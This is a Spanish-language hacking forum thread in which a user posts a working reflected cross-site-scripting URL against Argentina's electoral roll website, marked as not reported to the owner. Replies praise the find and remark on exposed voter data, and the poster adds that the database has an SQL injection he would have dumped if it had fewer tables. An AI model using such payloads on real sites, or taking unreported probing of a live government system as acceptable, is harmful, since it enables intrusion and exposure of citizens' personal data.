[XSS] padron.gob.ar

ANTRAX · Mayo 17, 2013, 02:15:03 PM

XSS en el padron electoral de Argentina

Reportado: NO
URL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/www.padron.gob.ar/consulta/version_impresa.php?x_mat=111111111&x_ape=%3Cscript%3Ealert%28%27ANTRAX%27%29%3C/script%3E&x_nom=los%20nonamesx_sec=7&x_cir=57&x_dess=LaConChinChina&x_desc=CIUDAD&x_desl=&x_dirl=&x_locl=&x_mes=0&x_det=&x_par=0&x_dis=&x_dom=CalleFalsa%20123&x_pro=&x_tip=DNI-EA&x_padron=&x_orden=

hielasangre · Mayo 17, 2013, 05:26:00 PM

Eso es lo de menos, el problema son los datos expuestos xD
Buen XSS :B

ANTRAX · Mayo 17, 2013, 05:36:33 PM

Hablando de datos expuestos...

StuXn3t · Mayo 17, 2013, 06:00:20 PM

Wow....buen aporte Antrax!
Con eso se demuestra el riesgo de las Aplicaciones Web....

hielasangre · Mayo 17, 2013, 06:35:29 PM

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hablando de datos expuestos...

Me mato de Gorila antes que planero xD

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

s3cur1tyr00t · Mayo 17, 2013, 07:02:32 PM

Mmm, si investigan un poquito mas se van a dar cuenta que estan bastante mas fregados que un XSS en la aplicación

ANTRAX · Mayo 17, 2013, 07:07:42 PM

Es un desastre... La base de datos del padron de Argentina tiene un SQLi... Lastima que son muchas tablas sino la bajaba ajajaja

[XSS] padron.gob.ar

ANTRAX

Mayo 17, 2013, 02:15:03 PM Ultima modificación: Enero 10, 2015, 01:10:19 PM por Expermicid

hielasangre

Mayo 17, 2013, 05:26:00 PM #1

ANTRAX

Mayo 17, 2013, 05:36:33 PM #2

StuXn3t

Mayo 17, 2013, 06:00:20 PM #3

hielasangre

Mayo 17, 2013, 06:35:29 PM #4

s3cur1tyr00t

Mayo 17, 2013, 07:02:32 PM #5

ANTRAX

Mayo 17, 2013, 07:07:42 PM #6